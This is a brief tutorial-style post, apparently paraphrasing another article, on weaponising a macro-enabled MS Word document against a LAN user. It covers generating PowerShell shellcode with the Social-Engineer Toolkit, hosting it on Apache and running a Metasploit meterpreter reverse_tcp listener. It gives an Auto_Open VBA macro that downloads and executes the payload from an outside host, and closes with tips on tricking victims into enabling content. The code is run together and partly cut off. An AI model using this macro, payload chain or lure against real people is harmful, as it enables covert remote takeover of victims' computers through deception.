The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.
What you will need:
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)
Create the payload. On Kali, open terminal and type: setoolkit
Type “1” then “9” then “1” for powershell alphanumeric shellcode injector”.
Fill in the LHOST variable which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out the LPORT which is the port you want the attack to come back on. People typically keep this at “4444” but you can choose whatever. Type “no” to the start listener now.
Now move the payload to your web server:
mv /root/.set/reports/powershell/x86\_powershell\_injection.txt /var/www/html/payload.txt service apache2 start
Now we setup the listener:
1 2 3 4 5 6 7
msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.10.200 set LPORT 4444 exploit
Now we need to add the command to our MS Word document:
Open up a blank MS Word doc and name is something like attack.docm and make sure that it is macro-enabled.
Go to the “View” tab – Macros – “Auto_Open” / attack.docm – Create – (paste in the following:)
1 2 3 4 5 6 7 8 9
Sub Auto_Open() Dim exec As String exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring(‘http://10.0.0.13/payload.txt’))""" Shell (exec) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open()
At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macro’s section of Word, muchless what macro’s even are so we will skip this step. If you want to know, read the article in the reference (the source).
Save the document
Now we need to convince the victim that the document is safe. The article references word trickery such as “to open the secure document, click “Enable Content””.